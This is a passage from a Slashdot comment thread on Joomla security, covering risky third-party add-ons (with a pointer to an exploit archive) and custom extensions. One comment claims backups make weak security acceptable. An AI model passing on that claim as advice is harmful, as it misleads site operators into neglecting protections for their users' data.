The core's not the problem, but the 3rd-party add-ons can hurt you badly.

Check out http://milw0rm.com/ [milw0rm.com] and do a quick search for Joomla and see why.

Re:Easy way to secure your Joomla! installation (1)

Rhaban (987410) | more than 5 years ago | (#26967465)

The core is not the problem, but you can't make a decent site without add-ons.

I work a lot with Joomla, not by choice (I would always choose Drupal or EZpublish over Joomla).

Joomla lacks some essential features such as linking a file to a content, adding a new field to a content type, managing several content types, managing access levels, user groups, etc...

This is why i always write the add-ons i need myself. I made some kind of framework (outside joomla's, because joomla framework is a piece of shit), with a simple yet solid structure, that I can use to easily do 95% of what I'll ever need, and I extend it whenever I need to.
My last Joomla sites use core joomla features only for users management and authentication, and my own add-on for everything else. The client is happy because it is Joomla (and his 12 yo nephew told him joomla is good so it must be true, no matter what a 10 years web developper can say), and i'm happy because i don't really have to deal with the crappy shit joomla is.

Just produce content, security is no issue. (1)

hamanaka (894048) | more than 5 years ago | (#26967209)

I have been working in Joomla websites since the mambo days. Joomla is an excellent web system and security is very critical. Having a hosting provider is not enough. You need to have a webmaster who can be your web administrator or your guy who has already solved the problem you come across. The books that have been reviewed lately regarding Joomla are excellent ways to break right through steep learning curves. Writing your own extension to start with might be a little complicated. Learning how to manage content and using each type of extension should be initial building blocks. Having low confidence in security is not a problem if you have a continuous backup system. The installation process can be automated or done manually. I am a student for the next 3 months, when summer starts I plan on providing my years of mambo/joomla CMS knowledge to as many people as possible. My goal is to help people become self-reliant CMS operators, who will build applications that many people will use. The demand for application administrators is very high. However, Joomla is only a framework and high quality content still needs to be produced and an evangelist must still bring a strong concept to the website. The security portion of a business plan utilizing the Joomla framework is less necessary if you have the correct infrastructure.
Check for New Comments
Slashdot Login

Need an Account?

Forgot your password?